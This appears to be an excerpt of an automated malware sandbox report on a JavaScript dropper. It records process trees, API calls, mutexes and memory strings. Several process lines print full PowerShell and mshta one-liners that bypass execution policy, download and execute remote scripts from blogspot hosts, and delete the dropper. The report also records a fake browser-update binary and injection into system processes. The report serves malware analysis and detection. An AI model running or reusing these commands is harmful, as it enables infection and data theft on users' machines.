                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0DBD2052_2_7F0DBD20
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E1D7152_2_7F0E1D71
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0BFC0552_2_7F0BFC05
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F095C1152_2_7F095C11
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E2C9C52_2_7F0E2C9C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E5B1A52_2_7F0E5B1A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0BEB1D52_2_7F0BEB1D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E73D152_2_7F0E73D1
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D2A0452_2_7F0D2A04
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C225D52_2_7F0C225D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D3A9852_2_7F0D3A98
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0B9A9E52_2_7F0B9A9E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C991052_2_7F0C9910
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0AD95152_2_7F0AD951
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C496D52_2_7F0C496D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C519052_2_7F0C5190
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E61AF52_2_7F0E61AF
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B8F589B appears 178 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B8FDC24 appears 57 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B8F2FB3 appears 160 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6BA19AF0 appears 45 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B8FDC4E appears 35 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B984DE0 appears 32 times
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: String function: 6B904396 appears 54 times
                      Source: 0a0#U00a0.jsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@79/158@18/15
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FC9A2 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree,52_2_6B8FC9A2
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FF3BF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,52_2_6B8FF3BF
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,52_2_6B907B61
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,52_2_6B907EA9
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,27_2_00007DF4586B286C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA147C CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,50_3_00007DF423DA147C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE6329 LoadResource,LockResource,SizeofResource,52_2_00FE6329
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B906F73 OpenSCManagerW,OpenServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,52_2_6B906F73
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B907667 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,52_2_6B907667
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9075C3 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle,52_2_6B9075C3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:304:WilStaging_02
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:304:WilStaging_02
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-d62aa157-c35a-233399-159d37406db3}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4112
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-3425316567-2969588382-3778222414-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:304:WilStaging_02
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zapl50p.5yx.ps1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCommand line argument: kernel32.dll52_2_00FE6A08
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCommand line argument: DllEntry52_2_00FE6A08
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: chrome.exe, 00000023.00000002.289669975648.0000013C179D0000.00000002.00000001.00040000.0000001B.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: chrome.exe, 00000023.00000002.289670217352.0000013C179F5000.00000002.00000001.00040000.0000001D.sdmp, chrome.exe, 00000023.00000002.289685817691.000060C4008C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://www.google.com/support/installer/?
                      Source: AvastBrowserUpdate.exeString found in binary or memory: Application update/install
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 56
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"Jump to behavior
